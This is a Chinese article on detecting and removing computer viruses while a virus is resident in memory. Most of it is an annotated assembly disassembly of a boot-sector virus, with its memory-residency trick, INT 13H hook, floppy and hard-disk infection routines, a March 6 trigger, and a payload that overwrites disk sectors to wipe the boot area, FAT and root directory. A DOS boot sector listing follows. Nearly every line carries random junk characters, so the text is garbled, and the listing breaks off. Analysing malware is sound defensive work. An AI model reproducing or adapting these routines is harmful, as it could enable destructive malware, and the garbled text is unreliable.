近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 en~(XE1
?? ->#7_W
?? 一 、 带毒环境下检测清除病毒的意义 @o^sp|k !
?? Vgm{=$
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 B'0Il"g'
?? Y2D)$
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 -s!PO;qm
?? $fvUb_n
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 pcl_$2_
?? YGn:_9
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 6ensNr~ea
?? 2Uk8{d
?? 二 、带毒环境下检测清除病毒的原理 <*5D0q#~"
?? 3 \WdA$Wx
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 9_/1TjrDN
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 U&a]gkr
^e 6(#SqR
6qA{l_V
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " p_(hM&>C
病毒体: 5Np. &
JMP 01AF ;JMP到01AF =UP)b9*h
DB 00 ;病毒标计 4* hmeS"
DW 00F5 ;此为搬到高位址后,远程跳转指令 3a S>U #
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX -T(V6&'Qi
DB 02 UX9o
DW 0003 ;此为软盘识别标记,硬盘为0007 nb!m>0*/
DW EC59 ; CUd'*Ewu
DW F000 ;INT 13H的原入口 QtzHr
. bcE DjLXq
. tr} $82Po
. z'I0UB#
. NV;tsuA|
. MdfkC6P
XOR AX,AX ;清除AX 6a!X`%N=
MOV DS,AX; ;让DS=0000 Zj0&/S
CLI ;清I标志积存器 fjJIF%
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 *Ee# x!O
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 x[kdQj2[&
MOV SP,AX ;开机时为0000:7CB6 zC^Ib&gm>,
STI ;设I标志积存器 8vP)qy8
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A / L8=8
PUSH AX ;用RETF,把程序转到引导或分区表位置 w/<hyEpxg
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 n#fg7d%
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 0?sp
MOV AX,[004E] ;取INT 13H的段地址 Aws
TDM
MOV [7C0C],AX ;存到010C ^YZ#P0 y
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 MG@19R2s
;读写以便传播发作 /4f;Niem
:4Vt
MOV AX,[0413] ;取得内存K数,放在AX 0.5_,an3
DEC AX ; 334*nQ
DEC AX ;减2k内存 wDG4rN9x
MOV [0413],AX ;存回,通常是638K KKzvoc?Bt
MOV CL,06 ; 3QVng^"B)
SHL AX,CL ; KP(Bu0S
MOV ES,AX ;算出减2K后病毒本体的位址 lo#,zd~
MOV [7C05],AX ;AX存入0105 IR&u55#I6
PTh
Ya
;病毒常用手法将系统高段内存减少以便驻留 Ui.F<,E
;这样可以免于被其他程序覆盖 ^eRuj)$5A
@mazwr{B
MOV AX,000E ;病毒拦INT 13H -wt2ydzos
;ISR起始的偏移量 b,W'0gl
MOV [004C],AX ; kShniN
MOV [004E],ES ;设原为病毒的INT 13H ublY!Af
MOV CX,01BE ;病毒长度为1BE gs3}rW
MOV SI,7C00 ;从JMP 01AF开始 A.FI] K@
XOR DI,DI ;DI=0 o5R\7}]GE
CLD ;清方向标志 m~K]|]iqQ
REPZ; zl[JnVF\6
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 {mQJ6
G'ny
CS: ;分区表能载入0000:7C00正常运作 #@fypCc
JMP FAR [7C03] ;跳到为搬过后的位址 2^aTW`>L
XOR AX,AX ;清AX >seB["C
MOV ES,AX ;ES=0000 BSY#xe V
INT 13 ;复位磁盘 SOL=3hfb^
PUSH CS ; >vU
Hf`4T
POP DS ;让DS=CS 1DP)6{x
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 ^b~5zhY&
MOV BX,7C00 ;读到0000:7C00 ;~J~g#
MOV CX,[0008] ;硬盘第0道,第7扇区 _<7FR:oBZ
CMP CX,+07 ;比较是否从硬盘启动 6>I.*Qt \l
JNZ 0213 ;不是跳0213 :Mk}Suf&H
MOV DX,0080 ;第一硬盘C:第零面 NsHveOK1.
INT 13 ;用INT 13号中断,读 QFYy$T+W
JMP 023E ;跳023E比较日期,发作或正常开机 a6d KQ3D
MOV CX,[0008] ;软盘0道,第3扇区 ._Xtb,p{
MOV DX,0100 ;A:的第0面 lUEyo.xVt
INT 13 ;INT 13读盘 K;l'IN"N
JB 023E ;失败跳023E :S12=sFl$
PUSH CS ?+\,a+46P_
POPES ;让ES=CS \YS?}! 0
MOV AX,0201 ; nz\fN?q
MOV BX,0200 ; rWXW}Yg
MOV CX,0001 ; De_</1Au!2
MOV DX,0080 ; as4NvZ@+r
INT 13 ;读入C:的分区表到0200,以便下面比较 F?kVW[h?q
JB 023E ;失败跳023E w$4Lu"N:
XOR SI,SI ;清SI O|~'-^
CLD ;清方向标志以便比较 !Xi>{nV
LODSW ;载入一个WORD到AX d#Ajb
CMP AX,[BX] ;比较有无病毒存在..E9AC ]N_^{k,
JNZ 0287 ;没有则跳0287传染 vp@+wh]#
LODSW ;载入一个WORD到AX =*Xf(mh c
CMP AX,[BX+02] ;再次确认..0000 v3Yj2LSqx
JNZ 0287 ;没有跳0287 bB-v ar
XOR CX,CX ;清CX 3#[I_
MOV AH,04 ; MV}]i@V
INT 1A ;取得日期 `%3p.~>
CMP DX,0306 ;是否为三月六日 p/~kw:I
JZ 024B ;是跳024B传染 N3<Jh
RETF ;把程序交还给引导启动完成 E6k&r}
M'iKk[Hjfx
步骤4:病毒INT 13代码分析 ~@a
R5Q>us
方法:U +kL(lBv'
PUSH DS ;首先把要用到积存器 dk/*%a
+
PUSH AX ;入栈保存 N}G(pq}
OR DL,DL ;比较是否为软盘 }o-P
JNZ 002F ;如不是则退出传染 8B/9{8
XOR AX,AX ;AX=0 uw!|G>
MOV DS,AX ;数据代段=0 "S:N-Tf%U
TEST BYTE PTR [043F],01 ;比较是否为A盘 W)cLMGet
JNZ 002F ;不是则退出 }HorR2(`N
POP AX ;将以上保存积存器 :\_MA^<
POP DS ;弹栈恢复 F.D1;,x
PUSHF ;压栈标志积存器 c^IEj1@}'?
CS: ;以便执行原INT 13 ud D[hPJd
CALL FAR [000A] ;执行原INT 13 H@'
@xHv
PUSHF ;再次压栈 ;[ueNP%*y|
CALL 0036 ;以便跳转到传染程序 hJsC
\ C,^
POPF ;跳转到执行传染 4
G[hU4L
RETF 0002 ;结束中断调用返回 Y;Gm,
POP AX ;恢复
YPnJldVn
POP DS ;堆栈 ':]a.yA\1
CS: ;跳转到原正常INT 13 N-E`go
JMP FAR [000A] ;地址执行 RfG$Px '
x~^I/$
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 D:tZiS=0
ycD.:w p\'
步骤5:传染过程分析 YCO:bBmp:
方法:U @98SC}}u
对软盘传染过程: %)Dd{|c
PUSH AX ;工 QL18MbfqP
PUSH BX ;作 T9-a
uK0d
PUSH CX ;寄 yW?%c#9D
PUSH DX ;存 T
l(uqY?9
PUSH DS ;器 |9]K:A
PUSH ES ;入
Tpx,41(k
PUSH SI ;栈 #9VY[<
PUSH DI ;保存 #/<Y!qV&
PUSH CS ;以压/弹栈方式 PSS/JFZ^
POP DS ;使数据段DS和 , vyx`wDd
PUSH CS ;附加段ES均指向 %W;Gf9.w
POP ES ;代码段CS @(fY4]K
MOV SI,0004 ;试4次 ilpZ/Rs
MOV AX,0201 ;设置各 P%HyIODS
MOV BX,0200 ;积存器 e~]e9-L>I
MOV CX,0001 ;为读软盘 }yDq\5s
Q[
XOR DX,DX ;引导扇区做准备 MWh+h7k'
PUSHF ;压栈标志积存器 qXhf?x
CALL FAR [000A] ;正常的INT 13调用 _C=[bI@
JNB 0063 ;成功则转判断 y4rJ-
XOR AX,AX ;不成功复位 Z3>3&|&
PUSHF ;磁盘继续读 PJ:5Lb<
CALL FAR [000A] ;如果4次 $ywh%OEH
DEC SI ;均匀不成功 +N:6wZ7<f
JNZ 0045 ;则退出跳转 xGv,%'u\
JMP 00A6 ;退出传染 ]},Q`n>$
XOR SI,SI ;SI=0以便用 J&65B./mD9
CLD ;LODSW读入软盘 1e&b;l'*=
LODSW ;第1或第2字进行比较 ![ID0}MjJ
CMP AX,[BX] ;比较如果不包含病毒标志 -Bv1}xf=6
JNZ 0071 ;则跳转写传染 9k[},MM
LODSW ;如果已有标志 @i-@mxk6<
CMP AX,[BX+02] ;则退出 DeQ'U!?+N
JZ 00A6 ;传染子程序 b:cK >fh0_
MOV AX,0301 ;为写盘准备 ~{Rt4o _W
MOV DH,01 ;如果是360K KVpAV$|e
MOV CL,03 ;则写到1面0道3扇区 @aN=U=
CMP BYTE PTR [BX+15],FD ;比较软盘 +{i"G,3
JZ 0080 ;如果大于360K *1S.9L
MOV CL,0E ;写到1面0道14扇区 x~Ly$A2p
MOV [0008],CX ;写病毒标志到软盘 4eL54).1O
PUSHF ;调用原INT 13 1"B9Z6jf
CALL FAR [000A] ;进行传染 @ZR4%A"X4
JB 00A6 8!Mzr1:
MOV SI,03BE ;以下是将正常 ,xe@G)a
MOV DI,01BE ;引导扇区从 %aE7id>v6
MOV CX,0021 ;1BE起的21字节内容 x][9ptrh
CLD ;搬移到病毒程序尾部 ^1yTL5#:Vw
REPZ ;开始复制 <&EO=A
MOVSW 3nC#$L-
MOV AX,0301 ;写盘功能调用,写一个扇区 #r^@*<{^
XOR BX,BX ;将病毒程序 pjs9b%.
MOV CX,0001 ;写入软盘引导扇区内 ::Q);
XOR DX,DX ;设置为软盘 G|oB'~{&
PUSHF &\lS
CALL FAR [000A] ;执行正常INT 13调用写盘 -L3
|9k
POP DI ;将 pXj/6+^
POP SI ;工 Q*&aC|b&
POP ES ;作 ^'53]b:
POP DS ;寄 SOQ-D4q
POP DX ;存 vp75u93
POP CX ;器 gXLZ) >+A+
POP BX ;退 \{=`F`oB=
POP AX ;栈 xgqv2s>L
RET ;返回调用处 uQtk|)T E
对硬盘传染过程: dzE Q$u/I
MOV CX,0007 ;第7扇区 ?$@KwA
MOV [0008],CX ;此处为硬盘引导标记 m-S33PG{
MOV AX,301 ;写功能调用 &G|jzXE
MOV DX,0080 ;设置为硬盘 YEPG[W<kg
INT 13 ;将正常引导扇区写到0面0道7扇区内 5OW8G][
JB 13E ;失败则转 b|8>eY
MOV SI,03BE ;原分区表地址 *5_8\7d
MOV DI,01BE ;目标地址 y_4krY|Zx
MOV CX,0021 ;整个分区表 ~muIi#4
REPNZ g6/N\[b%
MOVSW ;开始复制 vWi.[]
;此段代码是将硬盘分区信息,搬移到病毒程序尾部 Q @OC =
;这样在分析着查看硬盘分区信息时仍能看到该部分 vV\F^
;内容,以次来麻痹分析者 -,fa{ yt-
MOV AX,0301 ;准备写病毒提进硬盘 5az
4N T
XOR BX,BX ;病毒体位置 . (*kgv@3x
INC CL ;第一扇区 H^PqYLjN
INT 13 ;开始写盘传染 dMs39j
JMP 013E ;转到13E处判断是否为3月6日,是则发作 U>_\
,dj*p,J
步骤6:破坏过程分析 CVSsB:H6e
方法:U s@)"IdSA(
主要分析对硬盘数据破坏: EfBVu
. !k= 0X\5L
. @wdB%
. qzlMn)e
. zhX`~){N6
. HMS9y%zl/
MOV DL,80 &A9A#It
MOV BYTE PTR[0007],04 #C,f/PXfaB
;准备写硬盘 @U
/3iDB\
MOV AL,11 ;写17个扇区 3+8"
MOV BX,5000
kulQR>u
MOV ES,BX ;从内存ES:5000中处开始写 ZYA.1VrM
INT 13 ;残不人睹 ]D) 'I`
JNB 0179 ;成功转179继续写 m!#)JFe67
XOR AH,AH Ad`[Rt']kI
INT 13 ;不成功复位磁盘继续 B`?N0t%X
INC DH ;使写操作磁头加1继续? .xLF}{u
CMP DH,[0007] ;比较是否小于0007单元值 C=dx4U~
JB 0150 ;是则返回开始处继续写 *n*N|6+
XOR DH,DH ;DH=0 C/CfjRzd
INC CH ;再加扇区 #?$'nya*u
JMP 0150 ;反回继续写 [#>$k
6F*
;以上操作实际上是对硬盘执行4次写操作,每次17个扇区 ZP63Alt
;共68个扇区,这样就完全破坏了盘中的引导扇区,根目录 o,Tr^e$
;和文件分配表。 _+Jf.n20
EB29vHAt~
引导扇区病毒,俺手里没有,这是一段DOS BOOT的分析。BOOT区病毒和他完成同样的工作,只不过每次 dp[w?AMhM9
读盘的时将自身写入磁盘。 B/sBYVU
引导过程如下: Id.Z[owC`Y
1>调整堆栈位置 rxy{a
2>修改并用修改后的磁盘参数表来复位磁盘系统 lR@i`)'?U
3>计算根目录表的首扇区的位置及IO.SYS的扇区位置 $nfBvf
4>读入根目录表的首扇区 ^L8Wn6s'
5>检查根目录表的开头两项是否为IO.SYS及MSDOS.SYS io9xI3{
6>将IO.SYS文件开头三个扇区读入内存0000:0700H处 # +QWi0B
7>跳到0000:0700H处执行IO.SYS,引导完毕 `Ge +(1x
003E FA CLI jqX@&}3@
003F 33C0 XOR AX,AX zOiY0`=
0041 8ED0 MOV SS,AX /\-2l+y>J
0041 8ED0 MOV SS,AX =, C9O
0043 BC007C MOV SP,7C00 ; 初始化堆栈 s7.p$r
0046 16 PUSH SS FfYd+]+?
0047 07 POP ES ;(ES)=0000H 8R)D ! 7[l
0048 BB7800 MOV BX,0078 ;1EH 号中断向量的地址为0000:0078H 3m43nJ.~
004B 36 SS: ;(SS)=0000H s?@)a,C%k
004C C537 LDS SI,[BX] ;取1EH号中断向量的内容存入DS:SI <nb3~z1
004E 1E PUSH DS ;该中断向量指向一个11字节的磁盘参数表 $p0 /6c
004F 56 PUSH SI ;取到后压入堆栈中保存 vlPl(F1
0050 16 PUSH SS FV^4
0051 53 PUSH BX ;保存地址0000:0078H 0 .FHdJ<
0052 BF3E7C MOV DI,7C3E ;7C3E-7C00=003EH,即偏移003EH,以下类推 1~R$$P11[9
0055 B90B00 MOV CX,000B ;磁盘参数表共11字节 R*Xu(89
0058 FC CLD 0tW<LR-}E
0059 F3 REPZ Pn+IJ=0Y
005A A4 MOVSB ;将磁盘参数表复制到0000:7C3EH处 &'huS?gA9
005B 06 PUSH ES U50s!Zt45
005C 1F POP DS ;(DS)=0000H $/, BJ/9
005D C645FE0F MOV BYTE PTR [DI-02],0F ;修改参数表中"磁头定位时间" 0E?s>-b
0061 8B0E187C MOV CX,[7C18] ;从BPB中取"每磁道扇区数" 62MRI
0065 884DF9 MOV [DI-07],CL ;修改参数表中"每磁道扇区数" @QVqpE<|
0068 894702 MOV [BX+02],AX ;(AX)=0000H,修改1EH号中断向量(段址) y7M:b Uh
006B C7073E7C MOV WORD PTR [BX],7C3E ;修改1EH号中断向量(偏移),这样1EH号 ?y>Y$-v/C
006F FB STI ;中断向量的内容为0000:7C3EH,指向新的磁盘参数表 @3-,=x
0070 CD13 INT 13 ;用新的磁盘参数表来复位磁盘 Y(hW(bd;
0072 7279 JB 00ED ;出错则转出错处理 l- 1]w$
y
$*AC>i\
; 下面一段程序计算扇区位置 ol$2sI=.s
0074 33C0 XOR AX,AX >&<<8Ln
0076 3906137C CMP [7C13],AX ;偏移0013H处是Dos分区的总扇区数 %_b^!FR
007A 7408 JZ 0084 ;为零表示大硬盘? {*?sVAvj
007C 8B0E137C MOV CX,[7C13] ;不为0则取出来放到偏移0020H处 @q> ktE_
0080 890E207C MOV [7C20],CX ;这个值本程序未用,似乎为IO.SYS准备的 GP[6nw_'^
0084 A0107C MOV AL,[7C10] ;取FAT表的个数 <DeKs?v
0087 F726167C MUL WORD PTR [7C16] ;乘以一个FAT表所占的扇区数 Ue{vg$5||
008B 03061C7C ADD AX,[7C1C] ;加上Dos分区前的扇区数(隐藏扇数,低位) 2/yXY_L
008F 13161E7C ADC DX,[7C1E] ; 高位 ] Wx>)LT
0093 03060E7C ADD AX,[7C0E] ;加上Dos分区内的保留扇区数(低位) IP30y>\
0097 83D200 ADC DX,+00 ; (高位) mFqSD
009A A3507C MOV [7C50],AX ;根目录表的首扇的逻辑扇区号(低位) " K 8&{=
009D 8916527C MOV [7C52],DX ; (高位) e}'#Xv
00A1 A3497C MOV [7C49],AX ;此处放IO.SYS的首扇的逻辑扇区号(低位) ^])e[RN7?n
00A4 89164B7C MOV [7C4B],DX ; (高位) zd*3R+>U'>
00A8 B82000 MOV AX,0020 ;根目录表中每项占32字节 ocIt@#20K
00AB F726117C MUL WORD PTR [7C11] ;乘以根目录表中的项数 #cj\~T.,,
00AF 8B1E0B7C MOV BX,[7C0B] ;取"每扇区的字节数" .1.J5>/n
00B3 03C3 ADD AX,BX ;这两条指令是为了取整 O;X(pE/G
00B5 48 DEC AX 9TVB<}0G
00B6 F7F3 DIV BX ;除以每扇字节数,得到根目录所占扇区数 ~!nLbK2
00B8 0106497C ADD [7C49],AX ;得到根目录表后首扇的逻辑扇区号(低位) J$#h(D%
00BC 83164B7C00 ADC WORD PTR [7C4B],+00 ; (高位) =zeFK_S!
;下面一段程序在根目录表中找系统文件IO.SYS和MSDOS.SYS %6NO 0 F^
00C1 BB0005 MOV BX,0500 ;内存缓冲区的偏移值 .
]o3A8
00C4 8B16527C MOV DX,[7C52] ;取根目录表的首扇的逻辑扇区号(高位) <`R|a *
00C8 A1507C MOV AX,[7C50] ; (低位) \!+-4,CbZY
00CB E89200 CALL 0160 ;将逻辑扇区号转换为物理扇区号 [ME}Cv`?<E
00CE 721D JB 00ED ;出错则转出错处理 u\{qH!?t
00D0 B001 MOV AL,01
SwdC,
00D2 E8AC00 CALL 0181 ;读一个扇区到内存(根目录的首扇) 10C 2=
00D5 7216 JB 00ED ;出错处理 ;YK!EMM4!h
00D7 8BFB MOV DI,BX ;内存缓冲区的首址 Aautih@LX
00D9 B90B00 MOV CX,000B ;比较11个字节 gEZwW]r-
00DC BEE67D MOV SI,7DE6 ;偏移01E6处是串"IO SYS",长11字节 NXzU0
00DF F3 REPZ 9z5"y|$
00E0 A6 CMPSB ;看第一项是否为IO.SYS ,c4c@|Bh?
00E1 750A JNZ 00ED ;不是则出错 "El^38Ho
00E3 8D7F20 LEA DI,[BX+20] ;跳过32字节就指向第二项 G1kaF/`O
00E6 B90B00 MOV CX,000B ;比较11个字节 Z69+yOJI
00E9 F3 REPZ N#(jK1`y
00EA A6 CMPSB ;看第二项是否为MSDOS.SYS 8{R_6BS
00EB 7418 JZ 0105 ;是则两个文件都已找到,跳过出错处理 ! jbEm8bt
_Kc1
;下面一段进行出错处理 Dh2:2Rz=#7
00ED BE9E7D MOV SI,7D9E ;偏移019EH处是串"Non system disk..." IK*oFo{C=K
00F0 E85F00 CALL 0152 ;显示字符串 Y%<`;wK=^
00F3 33C0 XOR AX,AX \*f;!{P{
00F5 CD16 INT 16 ;等待任一键按下 az0cS*@
00F7 5E POP SI Vh"MKJ'R^
00F8 1F POP DS ;得到1EH号中断向量的地址0000:0078H 9o-!ecx}
00F9 8F04 POP [SI] kWB, ;7
00FB 8F4402 POP [SI+02] ;恢复1EH号中断向量的内容 Ya}T2VX
00FE CD19 INT 19 ;自举 3g4e']t
0100 58 POP AX `1nRcY
0101 58 POP AX 9<xTu>7J
0102 58 POP AX ;清理堆栈 BG'6;64kx6
0103 EBE8 JMP 00ED ;再次试图起动 8AT;8I<K
G/v|!}?wG
;下面读入IO.SYS的头3个扇区到内存0000:0700H处 ds-
yif6
0105 8B471A MOV AX,[BX+1A] ;从根目录表第一项中取IO.SYS的首簇号 SHMl%mw
0108 48 DEC AX :e1'o
0109 48 DEC AX ;首簇号减二 ^9&b+u=X
010A 8A1E0D7C MOV BL,[7C0D] ;取每簇的扇区数 Da"yZ\4
010E 32FF XOR BH,BH nIf N"
0110 F7E3 MUL BX ;(首簇号 - 2)乘以 每簇的扇区数 'UY[ap
0112 0306497C ADD AX,[7C49] ;相加后得到IO.SYS的首扇的逻辑扇区号 ]EB6+x!G
0116 13164B7C ADC DX,[7C4B] YecT 96%
011A BB0007 MOV BX,0700 ;内存缓冲区的偏移值 ?qk@cKS
011D B90300 MOV CX,0003 ;循环计数初值,读3个扇区 :3JCvrq
0120 50 PUSH AX ;逻辑扇区号进栈(低位) n
vm^k
0121 52 PUSH DX ; (高位) mO#I nTO
0122 51 PUSH CX ;循环计数器进栈 ]#F q>E
0123 E83A00 CALL 0160 ;逻辑扇区号转换为物理扇区号 Mv|vRx^b
0126 72D8 JB 0100 ;出错处理 p1+7<Y:
0128 B001 MOV AL,01 |y.zocBj
012A E85400 CALL 0181 ;读一个扇区到内存缓冲区 r=h8oUNEJ*
012D 59 POP CX ;循环计数出栈 cp$.,V
012E 5A POP DX :@.C4oq
012F 58 POP AX ;逻辑扇区号出栈 :~yzDk\I"-
0130 72BB JB 00ED ;读盘出错处理 CE)*qFs
0132 050100 ADD AX,0001 H{ZLk,
0135 83D200 ADC DX,+00 ;下一个扇区 L>SZgmV+
0138 031E0B7C ADD BX,[7C0B] ;缓冲区指针移动一个扇区的大小 5v"Y\k+1
013C E2E2 LOOP 0120 ;循环读入三个扇区 _-n Y2)
013E 8A2E157C MOV CH,[7C15] ;取"磁盘介质描述",传给IO.SYS Z;hyi'rPJ
0142 8A16247C MOV DL,[7C24] ;取"系统文件所在的驱动器号" d-~vR(tU
0146 8B1E497C MOV BX,[7C49] ;取IO.SYS的首扇的逻辑扇区号 F&